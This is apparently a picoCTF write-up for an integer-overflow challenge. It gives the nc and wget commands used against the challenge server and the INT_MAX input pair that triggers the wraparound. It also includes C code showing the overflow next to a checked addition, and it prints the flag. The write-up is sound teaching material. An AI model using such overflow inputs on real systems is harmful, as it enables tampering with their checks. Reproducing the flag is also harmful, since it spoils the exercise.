Description
The bank’s challenge asks for two positive integers that satisfy n1 > n1 + n2 or n2 > n1 + n2. Triggering 32-bit integer overflow is the intended exploit.
Setup
Review the provided source to confirm the comparison uses signed 32-bit ints.
Connect to the service via nc saturn.picoctf.net 60781 and submit two large positive values that overflow when added.
wget https://artifacts.picoctf.net/c/456/flag.c && cat flag.c
python3 - <<'PY' | nc saturn.picoctf.net 60781
print(2147483647)
print(2147483647)
PY
Solution
- Step 1: Understand the constraint. Because 32-bit signed addition wraps, adding two maximum ints produces a negative result. This satisfies the inequality check.
- Step 2: Submit the overflow pair. Send 2147483647 twice (or any pair that sums beyond INT_MAX). The service interprets the overflow and prints the flag.
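The wraparound from Step 1, next to an addition that refuses to overflow, as an added example that is not taken from flag.c. The helper names `wrapped_sum`, `overflow_condition` and `checked_add` are assumptions made for illustration.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model of 32-bit two's-complement wraparound. Signed overflow is undefined
   behaviour in C, so the sum is computed in uint32_t (well defined, modulo
   2^32) and converted back. The conversion is implementation-defined and
   wraps on gcc and clang. */
static int32_t wrapped_sum(int32_t a, int32_t b) {
    return (int32_t)((uint32_t)a + (uint32_t)b);
}

/* The inequality from the challenge description, applied to the wrapped
   sum (hypothetical helper, not the challenge's own code). */
static bool overflow_condition(int32_t n1, int32_t n2) {
    int32_t sum = wrapped_sum(n1, n2);
    return n1 > sum || n2 > sum;
}

/* Hardened form: test the operands against the type limits before adding,
   so the signed addition is only performed when it cannot overflow. */
static bool checked_add(int32_t a, int32_t b, int32_t *out) {
    if ((b > 0 && a > INT32_MAX - b) || (b < 0 && a < INT32_MIN - b))
        return false;
    *out = a + b;
    return true;
}

int main(void) {
    int32_t r = 0;
    printf("INT32_MAX + INT32_MAX wraps to %d\n",
           (int)wrapped_sum(INT32_MAX, INT32_MAX));
    printf("inequality satisfied: %d\n",
           overflow_condition(INT32_MAX, INT32_MAX));
    printf("checked_add accepts the pair: %d\n",
           checked_add(INT32_MAX, INT32_MAX, &r));
    return 0;
}
```

Code that must add untrusted integers should use a pre-check like `checked_add` (or a compiler builtin with the same effect) and reject the input when it returns false.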
Flag
picoCTF{Tw0_Sum_Integer_Bu773R_0v3rf...8bd}
Any pair causing signed overflow works; using INT_MAX keeps the math simple.